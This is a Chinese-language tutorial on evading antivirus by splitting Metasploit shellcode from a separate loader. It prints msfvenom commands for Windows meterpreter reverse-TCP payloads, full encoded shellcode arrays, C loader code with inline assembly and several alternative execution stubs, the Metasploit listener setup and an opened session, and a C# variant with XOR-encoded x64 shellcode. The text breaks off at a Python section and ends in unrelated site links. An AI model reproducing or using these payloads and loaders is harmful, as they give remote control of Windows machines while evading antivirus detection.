Payload 实现后门分离免杀
众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。 接下来我们将使用ShellCode和执行器分离的方式来实现免杀 通过C语言编译后门1.首先使用 [[email?protected] ~]# msfvenom -a x86 --platform Windows > -p windows/meterpreter/reverse_tcp > -b 'x00x0b' LHOST=192.168.1.7 LPORT=8888 -f c Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of c file: 1571 bytes unsigned char buf[] = "xd9xc5xd9x74x24xf4xbax8bxfcx02xddx5ex2bxc9xb1" "x56x83xeexfcx31x56x14x03x56x9fx1exf7x21x77x5c" "xf8xd9x87x01x70x3cxb6x01xe6x34xe8xb1x6cx18x04" "x39x20x89x9fx4fxedxbex28xe5xcbxf1xa9x56x2fx93" "x29xa5x7cx73x10x66x71x72x55x9bx78x26x0exd7x2f" "xd7x3bxadxf3x5cx77x23x74x80xcfx42x55x17x44x1d" "x75x99x89x15x3cx81xcex10xf6x3ax24xeex09xebx75" "x0fxa5xd2xbaxe2xb7x13x7cx1dxc2x6dx7fxa0xd5xa9" "x02x7ex53x2axa4xf5xc3x96x55xd9x92x5dx59x96xd1" "x3ax7dx29x35x31x79xa2xb8x96x08xf0x9ex32x51xa2" "xbfx63x3fx05xbfx74xe0xfax65xfex0cxeex17x5dx58" "xc3x15x5ex98x4bx2dx2dxaaxd4x85xb9x86x9dx03x3d" "x9fx8axb3x91x27xdax4dx12x57xf2x89x46x07x6cx3b" "xe7xccx6cxc4x32x78x67x52x7dxd4x76xa5x15x26x79" "x8bx5dxafx9fx9bxcdxffx0fx5cxbexbfxffx34xd4x30" "xdfx25xd7x9bx48xcfx38x75x20x78xa0xdcxbax19x2d" "xcbxc6x1axa5xf9x37xd4x4ex88x2bx01x29x72xb4xd2" "xdcx72xdexd6x76x25x76xd5xafx01xd9x26x9ax12x1e" "xd8x5bx22x54xefxc9x0ax02x10x1ex8axd2x46x74x8a" "xbax3ex2cxd9xdfx40xf9x4ex4cxd5x02x26x20x7ex6b" "xc4x1fx48x34x37x4axcax33xc7x08xe5x9bxafxf2xb5" "x1bx2fx99x35x4cx47x56x19x63xa7x97xb0x2cxafx12" "x55x9ex4ex22x7cx7excex23x73x5bxe1x5exfcx5cx02" "x9fx14x39x03x9fx18x3fx38x49x21x35x7fx49x16x46" "xcaxecx3fxcdx34xa2x40xc4"; -a #指定payload目标框架 --platform #指定payload的目标平台 -p,--payload #指定需要使用的payload(攻击荷载) -f,--format #指定输出格式 (使用 --help-formats 来获取msf) -b 'x00x0b' #规避特殊字符串 2.将上面的ShellCode代码复制下来,打开 #include <stdio.h> #include <windows.h> //#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"") // 隐藏控制台窗口显示 #pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积 #pragma comment(linker,"/section:.data,RWE") // 启用数据段可读写 unsigned char shellcode[] = "xd9xc5xd9x74x24xf4xbax8bxfcx02xddx5ex2bxc9xb1" "x56x83xeexfcx31x56x14x03x56x9fx1exf7x21x77x5c" "xf8xd9x87x01x70x3cxb6x01xe6x34xe8xb1x6cx18x04" "x39x20x89x9fx4fxedxbex28xe5xcbxf1xa9x56x2fx93" "x29xa5x7cx73x10x66x71x72x55x9bx78x26x0exd7x2f" "xd7x3bxadxf3x5cx77x23x74x80xcfx42x55x17x44x1d" "x75x99x89x15x3cx81xcex10xf6x3ax24xeex09xebx75" "x0fxa5xd2xbaxe2xb7x13x7cx1dxc2x6dx7fxa0xd5xa9" "x02x7ex53x2axa4xf5xc3x96x55xd9x92x5dx59x96xd1" "x3ax7dx29x35x31x79xa2xb8x96x08xf0x9ex32x51xa2" "xbfx63x3fx05xbfx74xe0xfax65xfex0cxeex17x5dx58" "xc3x15x5ex98x4bx2dx2dxaaxd4x85xb9x86x9dx03x3d" "x9fx8axb3x91x27xdax4dx12x57xf2x89x46x07x6cx3b" "xe7xccx6cxc4x32x78x67x52x7dxd4x76xa5x15x26x79" "x8bx5dxafx9fx9bxcdxffx0fx5cxbexbfxffx34xd4x30" "xdfx25xd7x9bx48xcfx38x75x20x78xa0xdcxbax19x2d" "xcbxc6x1axa5xf9x37xd4x4ex88x2bx01x29x72xb4xd2" "xdcx72xdexd6x76x25x76xd5xafx01xd9x26x9ax12x1e" "xd8x5bx22x54xefxc9x0ax02x10x1ex8axd2x46x74x8a" "xbax3ex2cxd9xdfx40xf9x4ex4cxd5x02x26x20x7ex6b" "xc4x1fx48x34x37x4axcax33xc7x08xe5x9bxafxf2xb5" "x1bx2fx99x35x4cx47x56x19x63xa7x97xb0x2cxafx12" "x55x9ex4ex22x7cx7excex23x73x5bxe1x5exfcx5cx02" "x9fx14x39x03x9fx18x3fx38x49x21x35x7fx49x16x46" "xcaxecx3fxcdx34xa2x40xc4"; int main(int argc,char **argv) { __asm { lea eax,shellcode call eax } return 0; } 此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码. //第1种方法 void RunShellCode_2() { ((void(*)(void))&shellcode)(); } //第2种方法 void RunShellCode_3() { __asm { lea eax,shellcode; jmp eax; } } //第3种方法 void RunShellCode_4() { __asm { mov eax,offset shellcode; jmp eax; } } //第4种方法 void RunShellCode_5() { __asm { mov eax,offset shellcode; _emit 0xFF; _emit 0xE0; } } 3.在MFS控制主机,启动侦听程序. msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lhost 192.168.1.7 lhost => 192.168.1.7 msf5 exploit(multi/handler) > set lport 8888 lport => 8888 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.7:8888 启动我们的shellcode代码,就可看到反弹回一个shell. msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.7:8888 [*] Sending stage (179779 bytes) to 192.168.1.2 [*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805) meterpreter > sysinfo Computer : lyshark OS : Windows 10 (Build 19999). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > 通过C#语言编译后门C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:WindowsMicrosoft.NETFramework64目录中找到他的编译程序。为 1.使用MSF工具生成后门ShellCode,并将这段ShellCode保存到lyshark.txt。 [[email?protected] ~]# msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid > LHOST=192.168.1.30 LPORT=8080 -b 'x00' > -e x64/xor -i 10 -f csharp > -o ./lyshark.txt 如下就是生成的ShellCode代码 [[email?protected] ~]# cat lyshark.txt byte[] buf = new byte[951] { 0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97,0xb9,0xdc,0x04,0x58,0x27,0x2d,0xf8,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,0x4f,0xfb,0xfa,0x93,0x92,0x23,0x09,0x0c,0xb8,0xa5,0xb6,0x2c,0x64,0xbd,0xa6,0x4c,0x84,0xe6,0x4d,0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x79,0xf9,0x46,0xfd,0x3c,0xce,0x0a,0x9a,0x03,0xc7,0x18,0x47,0x90,0xc3,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x14,0x99,0x7d,0xbf,0xdf,0x38,0x12,0x08,0x2b,0x42,0xbc,0x98,0x2a,0xf3,0xaf,0x1f,0x67,0xf1,0x35,0x9f,0xd0,0x3f,0x13,0xa2,0xf5,0x88,0xe0,0x26,0xaa,0xb0,0x02,0xa4,0xe5,0x63,0xb1,0x8c,0x75,0xd5,0x06,0xb4,0x30,0x73,0x29,0x80,0xe3,0x0f,0x19,0xd4,0xc4,0x62,0x45,0x1a,0x22,0x5f,0x91,0x0b,0x6d,0x76,0x59,0xe8,0x8a,0xa8,0x8b,0x70,0x5a,0xd8,0xb3,0x82,0xb5,0x86,0x21,0xee,0x3a,0x3d,0xda,0xf2,0x2e,0x6a,0x54,0x5c,0x51,0x36,0xd9,0x43,0xad,0x89,0x3e,0x1c,0x95,0x0d,0x10,0x96,0xc1,0x49,0xed,0xba,0x32,0x52,0x94,0xd7,0xcf,0x65,0x24,0x85,0xab,0x69,0xfc,0xd3,0xdb,0x66,0x44,0x61,0xa1,0xa7,0x20,0xd6,0x7f,0x60,0xeb,0xcd,0x57,0xe7,0x8f,0x1d,0x39,0x6c,0x6e,0xcb,0x17,0x9c,0x9e,0x0e,0xd2,0xa0,0xde,0xd1,0xae,0xf6,0xac,0x07,0xbe,0x11,0xec,0xa3,0x72,0x33,0x87,0xc6,0x40,0x74,0x01,0xea,0x77,0x55,0xc2,0x7c,0x41,0x15,0xc0,0x6f,0x04 }; 通过Python语言编译后门(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- windows – 在控制文档管理方面我有哪些选择
- winapi – “@”在以Windows字体名称作为前缀时的含义是什么
- windows-server-2008-r2 – 如何在已经共享的文件夹上拥有写
- windows-server-2012 – 在Windows Server 2012 R2上使用相
- windows-phone-7 – 禁用Windows Phone中scrollviewer的垂直
- 在windows和linux上编译
- Windows Server 2012 R2无法使用GUI服务器管理器安装任何角
- windows – 查找计算机的IP,查找LAN上所有计算机的IP
- winapi – 从进程ID获取进程名称(win32)
- windows-server-2012 – WSUS每晚下载驱动程序更新